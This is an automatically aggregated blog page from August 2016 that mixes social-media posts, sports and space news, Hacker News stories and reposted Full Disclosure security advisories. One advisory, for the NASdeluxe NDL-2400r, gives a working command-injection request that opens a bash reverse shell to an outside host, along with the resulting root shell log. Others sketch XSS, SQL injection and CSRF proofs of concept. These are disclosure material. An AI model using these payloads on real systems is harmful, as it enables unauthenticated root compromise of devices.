Latest YouTube Video

Saturday, August 6, 2016

Tomatoes, finally some the birds didn't get


via Instagram http://ift.tt/2aC6KgQ

Cantata a voce sola di Contraldo con Flauto (Anonymous)

Composer, Anonymous. Movements/Sections, 3 movements. Year/Date of Composition, 1724. Language, Italian. Piece Style, Baroque.

from Google Alert - anonymous http://ift.tt/2aJD7uS
via IFTTT

MONUMENTO SIMÓN BOLÍVAR [Material gráfico] | Anonymous

Date: 1982; http://ift.tt/2arqOXy. Creation date: Period: 1982; 4 quarter of the 20th century; Time; Chronological period; Second millenium AD ...

from Google Alert - anonymous http://ift.tt/2aBw2fb
via IFTTT

Anonymous

Anonymous · wordpress-2 | 5th August 2016. A constant occurance at my school (may I add, middle school) is the sexist standards brought to be ...

from Google Alert - anonymous http://ift.tt/2aBuX79
via IFTTT

Ravens: Despite Justin Tucker's claim he'd try 84.5-yd FG, ST coordinator Jerry Rosburg says \"we have no plans for such\" (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Anonymous

The latest broadcasts from Anonymous (@jellywisper) on Periscope. hacking and helping to hack.

from Google Alert - anonymous http://ift.tt/2aBkyZ7
via IFTTT

On This Day 25-years Ago, The World's First Website Went Online

On this day 25 years ago, August 6, 1991, the world's first website went live to the public from a lab in the Swiss Alps. So Happy 25th Birthday, WWW! It's the Silver Jubilee of the world's first website. The site was created by Sir Tim Berners-Lee, the father of the World Wide Web (WWW), and was dedicated to information on the World Wide Web project. The world's first website, which ran on


from The Hacker News http://ift.tt/2aB0lT1
via IFTTT

Iran Bans Pokémon GO — It's My Way or the Highway!

Pokémon GO has become the world’s most popular mobile game since its launch in July, but not everyone loves it. Pokémon GO has officially been banned in Iran. The Iranian High Council of Virtual Spaces – the country's official body that oversees online activity – has prohibited the use of the Pokémon GO app within the country due to unspecified "security concerns," BBC reports. <!-- adsense


from The Hacker News http://ift.tt/2b0LF5J
via IFTTT

I have a new follower on Twitter


John R. Patterson
Customer Service Guru, Leadership Consultant, Office Construction & Relocation Expert, Best-selling Author, In-demand Speaker, Husband and Father of 5.
Atlanta, Georgia
http://t.co/mxTESELpDp
Following: 5270 - Followers: 7481

August 06, 2016 at 02:26AM via Twitter http://twitter.com/johnrpatt

I have a new follower on Twitter


Susan Cork
WordPress Designer and Front-End Developer.

https://t.co/GZvmvxh4vd
Following: 3307 - Followers: 3608

August 06, 2016 at 12:52AM via Twitter http://twitter.com/susancork

Apollo 15 Panorama


On July 31, 1971, Apollo 15 astronauts Jim Iwrin and Dave Scott deployed the first Lunar Roving Vehicle on the Moon. Using it to explore their Hadley-Apennine landing site they spent nearly three days on the Moon while Al Worden orbited above. This digitally stitched panorama shows Scott examining a boulder on the slope of 3.5 kilometer high Mons Hadley Delta to the left of their electric-powered, four-wheel drive vehicle. The sun at his back, Irwin casts the strong shadow to the rover's right. The panoramic view extends farther right to the sunward direction, over Hadley Rille and lunar terrain, revealed in harsh, unfiltered sunlight. In total, the rover traversed 28 kilometers (17 miles) on the lunar surface. The Apollo 15 mission returned about 76 kilograms of moon rocks to planet Earth. via NASA http://ift.tt/2aXWG6w

Orioles Video: Pedro Alvarez crushes two 400-plus foot HR in 7-5 win over White Sox; has hit 6 HR in his last 5 games (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Friday, August 5, 2016

Cantata Non lasciarmi o bella speme (Anonymous)

Composer, Anonymous. Movements/Sections, 3 movements. Year/Date of Composition, 1730-1740. Language, Italian. Piece Style, Baroque.

from Google Alert - anonymous http://ift.tt/2aBsgWn
via IFTTT

I have a new follower on Twitter


McGuire Space llc



Following: 1 - Followers: 1

August 05, 2016 at 09:21PM via Twitter http://twitter.com/McGuireSpace

[FD] [SYSS-2016-063] VMware ESXi 6 - Improper Input Validation (CWE-20)

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Multiple remote vulnerabilities (RCE, bof) in Nuuo NVR and NETGEAR Surveillance

On 04/08/16 17:46, Pedro Ribeiro wrote: > tl;dr > > Lots of RCE, hardcoded credentials, stack buffer overflow and > information disclosure in the Nuuo NVRmini and other network video > recorders of the same vendor. > These vulnerabilities also affect the NETGEAR Surveillance app (which > can be installed on the NETGEAR ReadyNAS). > > See the full advisory including PoC and exploits below, or at my github > (http://ift.tt/2aY9fg6). > > Metasploit modules have been submitted for vulns #1, #2 and #3: > http://ift.tt/2aXHszf > http://ift.tt/2aABQr2 > http://ift.tt/2aXHI1d > > Thanks to CERT/CC for helping me disclose this vulnerabilities - see > http://ift.tt/2aABmRN for their advisory. > > Regards, > Pedro > > ============================== > >>> Fix: > NETGEAR and Nuuo did not respond to CERT/CC coordination efforts (see > Timeline below), so no fix is available. > Do not expose any of these devices to the Internet or any networks with > unstrusted hosts. > > Timeline: > 28.02.2016: Disclosure to CERT/CC. > 27.04.2016: Requested status update from CERT - they did not receive any > response from vendors. > 06.06.2016: Requested status update from CERT - still no response from > vendors. > Contacted Nuuo and NETGEAR directly. NETGEAR responded with > their "Responsible Disclosure Guidelines", to which I did not agree and > requested them to contact CERT if they want to know the details about > the vulnerabilities found. No response from Nuuo. > 13.06.2016: CERT sent an update saying that NETGEAR has received the > details of the vulnerabilities, and they are attempting to contact Nuuo > via alternative channels. > 07.07.2016: CERT sent an update saying that they have not received any > follow up from both Nuuo and NETGEAR, and that they are getting ready > for disclosure. > 17.07.2016: Sent an email to NETGEAR and Nuuo warning them that > disclosure is imminent if CERT doesn't receive a response or status > update. No response received. > 01.08.2016: Sent an email to NETGEAR and Nuuo warning them that > disclosure is imminent if CERT doesn't receive a response or status > update. No response received. > 04.08.2016: Coordinated disclosure with CERT. > > >>> References: > [1] http://ift.tt/2aABmRN > > > ================ > Agile Information Security Limited > http://ift.tt/1JewOIU >>> Enabling secure digital business >> Forgot to mention - these are actually "0 days" since the vendors didn't bother to respond or issue fixes - see timeline above. Regards, Pedro

Source: Gmail -> IFTTT-> Blogger

[FD] Multiple remote vulnerabilities (RCE, bof) in Nuuo NVR and NETGEAR Surveillance

[FD] K2 (Joomla! Extension) < 2.7.1 - Reflected Cross Site Scripting

================================================================ K2 Joomla! Extension < 2.7.1 - Reflected Cross Site Scripting ================================================================ Information

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2016-6527 Possible Privilege Escalation in telecom of Samsung Mobile Phone

Hi, Description of the potential vulnerability: Severity: Medium Affected versions: L(5.0/5.1), M(6.0) Reported on: May 11, 2016 Disclosure status: Privately disclosed. The vulnerability in SmartCall Activity components of Telecom application can make crash and reboot a device when the malformed serializable object is passed. Fix: http://ift.tt/2aOZell SVE-2016-6244: Possible Privilege Escalation in telecom Sincerely, Zhaozhanpeng(0xr0ot)

Source: Gmail -> IFTTT-> Blogger

CyberTipline Allows Anonymous Online Tips

If you think someone you know is possessing child pornography, there is a way to make an anonymous online tip. Several federal law enforcement ...

from Google Alert - anonymous http://ift.tt/2b9jRYW
via IFTTT

[FD] CVE-2016-6526 Possible Privilege Escalation in telecom of Samsung Mobile Phone

Description of the potential vulnerability: Severity: Medium Affected versions: L(5.0/5.1), M(6.0) Reported on: May 11, 2016 Disclosure status: Privately disclosed. A vulnerability in SpamCall Activity components of Telecom application can make crash and reboot a device when the malformed serializable object is passed. Fix: http://ift.tt/2aOZell SVE-2016-6242: Possible Privilege Escalation in telecom Sincerely, Zhaozhanpeng(0xr0ot)

Source: Gmail -> IFTTT-> Blogger

[FD] [SYSS-2016-065] NASdeluxe NDL-2400r: OS Command Injection

Advisory ID: SYSS-2016-065 Product: NASdeluxe NDL-2400r Vendor: Starline Computer GmbH Affected Version(s): 2.01.10 Tested Version(s): 2.01.09 Vulnerability Type: OS Command Injection (CWE-78) Risk Level: High Solution Status: no fix (product has reached EOL since 3 years) Vendor Notification: 2016-07-04 Public Disclosure: 2016-08-03 CVE Reference: Not assigned Author of Advisory: Klaus Eisentraut, SySS GmbH, http://ift.tt/1Nxy8d7 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The product "NASdeluxe NDL-2400r" [3] is vulnerable to OS Command Injection as root. No credentials are required to exploit this vulnerability. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details / Proof-of-Concept: The language parameter in the web interface login request of the product "NASdeluxe NDL-2400r" is vulnerable to an OS Command Injection as root. The SySS GmbH sent the following HTTPS request to the webinterface: ~~~~~ POST /usr/usrgetform.html?name=index HTTP/1.1 Host: 192.168.1.1 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 97 lang=||`bash+-i+>%26+/dev/tcp/192.168.1.2/443+0>%261`&username=&pwd=&site=web_disk&login_btn=Einloggen ~~~~~ After sending the request, a reverse shell connected back: ~~~~~ # nc -lvvp 443 Listening on any address 443 (https) Connection from 192.168.1.1:49070 bash: no job control in this shell bash-3.00# whoami root bash-3.00# cat /img/version 2.01.09 ~~~~~ The tested firmware version was 2.01.09. The most current version is 2.01.10 according to the web page of the vendor [3]. However there are no hints of a security update in the release notes [4]. Thus, the SySS GmbH assumes that this vulnerability is likely also present in the most current firmware version from 2009-10-22. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The product has reached end-of-life (EOL) status since more than three years. Thus, no patch will be provided by the vendor. It is highly recommended to migrate to one of the newer and still supported NAS solutions which are (according to Starline Computer GmbH) not affected by this vulnerability. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2016-06-29: Vulnerability discovered 2016-07-04: asked info@starline.de for contact person (no answer) 2016-07-22: sent this advisory to info@starline.de 2016-07-22: response from vendor: won't fix (product reached EOL >3 years) 2016-08-03: public disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] SySS GmbH, SYSS-2016-065 http://ift.tt/2aAzgkW [2] SySS GmbH, SySS Responsible Disclosure Policy http://ift.tt/2aSI35b [3] NASdeluxe Homepage http://ift.tt/2avypSy [4] NDL-2400R Firmware Release Notes http://ift.tt/2aXGF10 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Klaus Eisentraut of the SySS GmbH. E-Mail: klaus.eisentraut@syss.de Public Key: http://ift.tt/2avzidS Key ID: 0xBAC677AE Key Fingerprint: F5E8 E8E1 A414 4886 0A8B 0411 DAB0 4DB5 BAC6 77AE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://ift.tt/HGsLr6

Source: Gmail -> IFTTT-> Blogger

[FD] D-Link NAS, DNS Series: Stored XSS via Unauthenticated SMB

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Kaspersky Safe Browser iOS Application - MITM SSL Certificate Vulnerability (CVE-2016-6231)

Kaspersky Safe Browser iOS Application - MITM SSL Certificate Vulnerability (CVE-2016-6231)

Source: Gmail -> IFTTT-> Blogger

Improvers Anonymous

An acting student stumbles his way into an addict support group meeting.

from Google Alert - anonymous http://ift.tt/2aZYqxp
via IFTTT

Food safe cookie cutters!


via Instagram http://ift.tt/2aV4LZd

Staying ahead of deadline


via Instagram http://ift.tt/2aZONxu

I have a new follower on Twitter


GrowthHIT
Growth on Demand. Hire an Elite Growth Team in 90 Seconds on https://t.co/l5dJik0NEK. #SEO #GrowthHacking #CRO #Startup #Launch #EmailMarketing #PPC
New York, NY
https://t.co/rruuhtBYVm
Following: 958 - Followers: 1782

August 05, 2016 at 03:36PM via Twitter http://twitter.com/GrowthHit

I have a new follower on Twitter


Webgrow UK
I'm A Family Man Who Loves Travel And Helping E-Commerce Owners Get More Sales & Conversions: Magento, PrestaShop and Woocommerce https://t.co/2HAu0koCk1
Aylesbury, UK
https://t.co/uDf4RFJint
Following: 3792 - Followers: 4349

August 05, 2016 at 03:36PM via Twitter http://twitter.com/webgrowuk

I have a new follower on Twitter


Kaymu
Kaymu is the #1 Online Shopping Community in Emerging Countries http://t.co/KYG3M5QCIC #Africa #Asia #Europe #Ecommerce #Marketplace

http://t.co/KYG3M68dQG
Following: 866 - Followers: 7626

August 05, 2016 at 03:36PM via Twitter http://twitter.com/KaymuGlobal

Ravens: Marshall Yanda is the top-rated guard in Madden NFL 17 with a 97 overall, 5 points ahead of Cowboys' Zack Martin (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] Ecwid Ecommerce Shopping Cart WordPress Plugin unauthenticated PHP Object injection vulnerability

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Cross-Site Scripting in Store Locator Plus for WordPress

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] DLL side loading vulnerability in VMware Host Guest Client Redirector

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

Allow anonymous event submitters to edit their own event

[resolved] Allow anonymous event submitters to edit their own event (2 posts). kimdebling. Member Posted 17 hours ago #. Hi,. I've set up my website ...

from Google Alert - anonymous http://ift.tt/2annhKb
via IFTTT

13 hour build, took over 30 minutes to slice


via Instagram http://ift.tt/2aA0ZDz

via Instagram http://ift.tt/2aniloY

ISS Daily Summary Report – 08/04/2016

Fluid Shifts Operations In the Service Module: With ground team assistance, crewmembers continued supporting Fluid Shifts Imaging exams that began yesterday by configuring the Optical Coherence Tomography (OCT) and the Distortion Product Otoacoustic Emission (DPOAE) hardware before completing a DPOAE test, OCT exam, and a Tonometry exam. The purpose of this investigation is to characterize the space flight-induced fluid shift, including intra- and extravascular shifts, intra- and extracellular shifts, changes in total body water and lower vs. upper body shifts. Noninvasive techniques are used to assess arterial and venous dimensions and flow parameters, ocular pressure and structure, and changes in intracranial pressure. Lower body negative pressure is being investigated for its ability to mitigate some of the effects of the space flight-induced fluid shift. Results from this investigation are expected to help define the causes of the ocular structure and vision changes associated with long duration space flight, and assist in the development of countermeasures. NanoRacks External Platform (NREP) and Gumstix Installation: The NREP was prepared for installation on the Japanese Experiment Module (JEM) Airlock (JEMAL) Slide Table.  During the NREP assembly, the NanoRacks-Gumstix experiment was installed onto the NREP.  Two crewmembers installed NREP on JEMAL Slide Table. One crewmember held NREP in place to keep the capture cones aligned with the NREP receptacles and the other operated the capture mechanism.  The Slide Table was then retracted from the JEM Pressurized Module (JPM) side into the JEMAL and the inner hatch was closed. The NanoRacks External Platform represents the first external commercial research capability for the testing of scientific investigations, sensors, and electronic components in space.  The NanoRacks External Platform will be installed on a payload required basis on the outside of the ISS on the JEM External Facility (JEM-EF).  The NanoRacks-Evaluation of Gumstix Performance in Low-Earth Orbit (NanoRacks-Gumstix) investigation tests small computers called Gumstix modules, which are based on open-source software, as an alternative off-the-shelf option for use in space. The investigation studies whether the Gumstix microprocessors can withstand the radiation environment on board the ISS.  The NREP will be deployed from the JEMAL and installed on the JEM-EF tomorrow.  Multi-Omics Operations:  The crew supported the Japan Aerospace Exploration Agency (JAXA) Multi-Omics investigation by collecting saliva samples and inserting them into a Box Module in the Minus Eighty-degree Freezer for ISS (MELFI). The investigation evaluates the impacts of space environment and prebiotics on astronauts’ immune function by combining the data obtained from the measurements of changes in the microbiological composition, metabolites profiles, and the immune system. Space Headaches: The crew completed the European Space Agency (ESA) Space Headaches questionnaire to provide information that may help in the development of methods to alleviate associated symptoms and improvement in the well-being and performance of crew members in space. Headaches during space flight can negatively affect mental and physical capacities of crew members which can influence performance during a space mission. Habitability Human Factors Directed Observations: The crew recorded and submitted a walk-through video documenting observations of life onboard ISS, providing insight related to human factors and habitability. The Habitability investigation collects observations about the relationship between crew members and their environment on the ISS. Observations can help spacecraft designers understand how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need. Extravehicular Activity (EVA) Tool Configuration: In preparation for the EVA currently planned for August 19, the crew gathered and configured required tools. Today’s Planned Activities All activities were completed unless otherwise noted. Multi Omics (MO) Saliva Sample Collection Multi Omics (MO) MELFI Sample Insertion Multi Omics (MO) Equipment Stowage Multi Omics (MO) Questionnaire Completion Window Shutter Close FLUID SHIFTS. Comm configuration for the experiment / r/g 9995 CASKAD. Manual Mixing in Bioreactor / r/g 2888 Acoustic Dosimeter Setup Day 3 FLUID SHIFTS. Gathering and Connecting Equipment for TV coverage OTKLIK. Equipment Check / r/g 1588 FLUID SHIFTS. Big Picture Words Review Verification of ИП-1 Flow Sensor Position BRI log download from RSS1 VIBROLAB. Monitoring hardware activation / r/g 2981 FLUID SHIFTS. Connecting OCT Laptop to RS BRI and HRF PC to ППС-26 (instead of RSE-Med) r/g 2983 FLUID SHIFTS. OCT Power up in SM FLUID SHIFTS. CCFP Activation and Settings Adjustments in RS СОЖ Maintenance US EVA Tool Preparation FLUID SHIFTS. DPOAE Setup in SM NREP. NANORACKS External Platform Assembly FLUID SHIFTS. TONO Hardware setup in SM FLUID SHIFTS. Chibis Setup / r/g 2982 FLUID SHIFTS. Operator Assistance with Chibis and Gamma-1 r/g 2982 FLUID SHIFTS. Gathering Data in SM EVA Tool Config Vacuum cleaning of ВТ7 screens on ГЖТ4 behind FGB panel 108 FLUID SHIFTS. Copying Data from CCFP/DPOAE devices and their deactivation in RS FLUID SHIFTS. Chibis Closeout Ops / r/g 2982 FLUID SHIFTS. Crew Onboard Support System (КСПЭ) Hardware Deactivation and Closing Application FLUID SHIFTS. TONO SM Stowage FLUID SHIFTS. OCT Power off in SM FLUID SHIFTS. Restore nominal comm config FLUID SHIFTS. Disconnecting of Laptop OCT, HRF and connecting RSE-Med r/g 2984 FLUID SHIFTS. Disconnecting US converter from СУБА / r/g 2984 Measuring SM interior panel elements / r/g 2991 JEMAL Slide Table (ST) Extension to JPM Side NREP. Mounting Slide Table NREP. Assistance in Mounting Slide Table JEMAL JEM Airlock Slide Table Retraction from JPM JEMAL Depress and Vent PAO Hardware Setup Crew Prep for PAO PAO Event Progress 433 (DC1) Transfers and IMS Ops / Progress 433 Transfers + r/g 2834, 2835, 2929, 2961 FLUID SHIFTS. OCT Hardware Stowage EHS CFM In-flight Microbiology Water Analysis FLUID SHIFTS. CCFP/PC Stowage VIBROLAB  Copy and Downlink Data / r/g 2981 DRAGON. Transfers Re-Packing fasteners into fasteners and tool kit delivered on Progress 433 / r/g 2990 FLUID SHIFTS. Hardware Gathering before Transfer to USOS FLUID SHIFTS Hardware setup to work with Dilution Measures Setup FLUID SHIFTS. Hardware Transfer to USOS FLUID SHIFTS. Cable removal BLB Rotor Inspection FLUID SHIFTS. OCT and Laptop Setup Removal/Installation of Signal Converter Unit (БПС) devices in TORU work station r/g 2992 Dragon Cargo Operations Conference FLUID SHIFTS. Ultrasound 2 Setup and Activation Demate telemetry […]

from ISS On-Orbit Status Report http://ift.tt/2azWSaD
via IFTTT

This ATM Hack Allows Crooks to Steal Money From Chip-and-Pin Cards

Forget about security! It turns out that the Chip-and-PIN cards are just as easy to clone as magnetic stripe cards. It took researchers just a simple chip and pin hack to withdraw up to $50,000 in cash from an ATM in America in under 15 minutes. We have been told that EMV (Europay, MasterCard and Visa) chip-equipped cards provides an extra layer of security which makes these cards more secure


from The Hacker News http://ift.tt/2azMWAP
via IFTTT

Torrentz.eu Shuts Down Forever! End of Biggest Torrent Search Engine

Over two weeks after the shutdown of Kickass Torrents and arrest of its admin in Poland, the world's biggest BitTorrent meta-search engine Torrentz.eu has apparently shut down its operation. The surprise shutdown of Torrentz marks the end of an era. <!-- adsense --> Torrentz.eu was a free, fast and powerful meta-search engine that hosted no torrents of its own, but combined results from


from The Hacker News http://ift.tt/2aJ3D8h
via IFTTT

Hack Apple & Get Paid up to $200,000 Bug Bounty Reward

So finally, Apple will pay you for your efforts of finding bugs in its products. While major technology companies, including Microsoft, Facebook and Google, have launched bug bounty programs over last few years to reward researchers and hackers who report vulnerabilities in their products, Apple remained a holdout. But, not now. On Thursday, Apple announced at the Black Hat security


from The Hacker News http://ift.tt/2aCAs91
via IFTTT

[FD] FortiCloud - (Reports Summary) Multiple Persistent Vulnerabilities

Document Title: =============== FortiCloud - (Reports Summary) Multiple Persistent Vulnerabilities References (Source): ==================== http://ift.tt/2aW1Lfo Release Date: ============= 2016-08-05 Vulnerability Laboratory ID (VL-ID): ==================================== 1735 Common Vulnerability Scoring System: ==================================== 3.6 Product & Service Introduction: =============================== FortiCloud is a hosted solution that helps you manage your FortiGate® network and your FortiAP® wireless infrastructure. The perfect companion to all your FortiGate & FortiWiFi units. FortiCloud is a hosted security and wireless infrastructure management solution and log retention service for FortiGate, FortiWiFi and FortiAP devices. It gives you centralized reporting, traffic analysis, configuration management, and log retention without the need for additional hardware and software, with the following feature set: ( Copy of the Vendor Homepage: http://ift.tt/2aW2nlu ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered multiple application-side validation vulnerabilities in the official Forticloud online service web-application. Vulnerability Disclosure Timeline: ================================== 2016-02-17: Researcher Notification & Coordination (Lawrence Amer) 2016-02-18: Vendor Notification (Fortguard PSIRT Security Team) 2016-03-02: Vendor Response/Feedback (Fortguard PSIRT Security Team) 2016-07-04: Vendor Fix/Patch (Fortinet Developer Team) 2016-07-22: Security Acknowledgements (Fortguard PSIRT Security Team) 2016-08-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple persistent cross site scripting web vulnerabilities has been discoverd in the offical version of Forticloud online service web-application. The security vulnerability allows remote attackers to inject own malicious script codes on the application-side of the affected online service module. The persistent input validation web vulnerabilities are located in the `Template - Summary` module of the main `Reports` module. The encoding of the add inputs in the title, description and charts is broken. Remote attackers with low or privileged web-application user accounts are able to inject own malicious script codes on the application-side of the reports - summary module. The request method to inject is POST and the attack vector is located on the application-side of the forticloud service. The injection point are the title, description and charts add input fields and the execution point is the reports - summary module of the web-application. The security risk of the persistent validation vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 3.6. Exploitation of the persistent input validation web vulnerability requires a low privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] FortiCloud - Reports - Templates Vulnerable Input(s): [+] Reports Main title [+] Reports Descriptions [+] Report Charts Vulnerable Parameter(s): [+] ext-gen2538, ext-gen2458 & gwt-HTML [+] fc-rpt-description [+] fc-rpt-title [+] fc-rpt-chart Affected Module(s): [+] Summary (Main.html - Index) Proof of Concept (PoC): ======================= The application-side web vulnerabilities can be exploited by remote attackers with low privileged application user account and low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the forticloud appliance web-application and login 2. Open the reports > templates module 3. Switch to Summary Reports 4. Edit existing or Add a new own title , description or chart 5. Inject as name value a script code payload (javascript) Note: >"
%20%20[PERSISTENT SCRIPT CODE EXECUTION!]

[FD] Subrion v4.0.5 CMS - SQL Injection Vulnerability

Document Title: =============== Subrion v4.0.5 CMS - SQL Injection Vulnerability References (Source): ==================== http://ift.tt/2azBfYj Release Date: ============= 2016-08-04 Vulnerability Laboratory ID (VL-ID): ==================================== 1893 Common Vulnerability Scoring System: ==================================== 7 Product & Service Introduction: =============================== Subrion is a full featured open source CMS written in PHP 5 & MySQL with many options. Here is the list of the most important features. You don't need to pay a single penny to start using Subrion CMS. It's not encrypted in any way so you can customize it per your needs. It's done to focus on the content management process. Start it hassle-free within just a few minutes and take care of the content. (Copy of the Vendor Homepage: http://ift.tt/2a45l6h ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a remote sql-injection vulnerability in the Subrion v4.0.5 content management system. Vulnerability Disclosure Timeline: ================================== 2016-08-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Intelliants LLC Product: Subrion - Content Management System (Web-Application) 4.0.5 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A remote sql-injection web vulnerability has been discovered in the Subrion v4.0.5 content management system. The vulnerability allows remote attackers to execute own malicious sql commands to compromise the application or dbms. The sql-injection vulnerability is located in the `query` and ` show_query` parameters of the `.database/sql/` module POST method request. Remote attackers are able to execute own sql commands by usage of the insecure sql management tool request. The attack vector of the vulnerability is application-side and the request method to inject is POST. The security risk of the sql-injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.0. Exploitation of the remote sql injection web vulnerability requires no user interaction and a low privileged web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. Request Method(s): [+] POST Vulnerable Module(s): [+] ./database/sql/ Vulnerable Parameter(s): [+] show_query [+] query Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers with privileged web-application user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Exploitation
POST /admin/database/sql/ HTTP/1.1 Host: http://ift.tt/2aISjci query=[SQL-INJECTION VULNERABILITY!]&show_query=[SQL-INJECTION VULNERABILITY!]&exec_query=Go

Source: Gmail -> IFTTT-> Blogger

[FD] Typesettercms v5.0.1 - (Delete Files) CSRF Vulnerability

Document Title: =============== Typesettercms v5.0.1 - (Delete Files) CSRF Vulnerability References (Source): ==================== http://ift.tt/2arOadi Release Date: ============= 2016-08-03 Vulnerability Laboratory ID (VL-ID): ==================================== 1889 Common Vulnerability Scoring System: ==================================== 3 Product & Service Introduction: =============================== Typesetter is an open source CMS written in PHP focused on ease of use with True WYSIWYG editing and flat-file storage. Typesetter CMS, A Free and Easy CMS for everyone. (Copy of the Vendor Homepage: http://ift.tt/1qgPgz7 ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a cross site request forgery vulnerability in the official Typesettercms v5.0.1 web-application. Vulnerability Disclosure Timeline: ================================== 2016-08-03: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Typesetter Product: Typesettercms - Content Management System (Open Source) 5.0.1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A cross site request forgery web vulnerability has been discovered in the official Typesettercms v5.0.1 web-application. The issue allows remote attackers to manipulate client-side browser to web-application requests to execute service functions via non-expired session credentials. The cross site request forgery vulnerability is located in the cms `file` parameter of the `extra` module POST method request. In the absence of a security token an attacker can execute code arbitrary against administrator account to permanenly delete the pages of the website via panel. Due to the infrastructure the issue becomes more critical without a checkbox to confirm the delete of any page. The security risk of the client-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0. Exploitation of the non-persistent web vulnerability requires no privileged web application user account and low or medium user interaction. Successful exploitation of the vulnerability results in the execute of the delete function of pages without secure approval or validation. Proof of Concept (PoC): ======================= The csrf web vulnerability can be exploited by remote attackers without privileged web-application user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Exploitation Reference(s): http://localhost:8080/ http://localhost:8080/Admin/ http://localhost:8080/Admin/Extra http://localhost:8080/Admin/Extra?cmd= http://localhost:8080/Admin/Extra?cmd=DeleteArea http://localhost:8080/Admin/Extra?cmd=DeleteArea&file= Security Risk: ============== The security risk of the client-side cross site request forgery web vulnerability in the file parameter of the extra module is estimated as medium. (CVSS 3.0) Credits & Authors: ================== ZwX - (http://zwx.fr) [ http://ift.tt/1OEBOwM ] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-lab.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: twitter.com/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1oSBx0A Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission. Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

I have a new follower on Twitter


Mediasphere
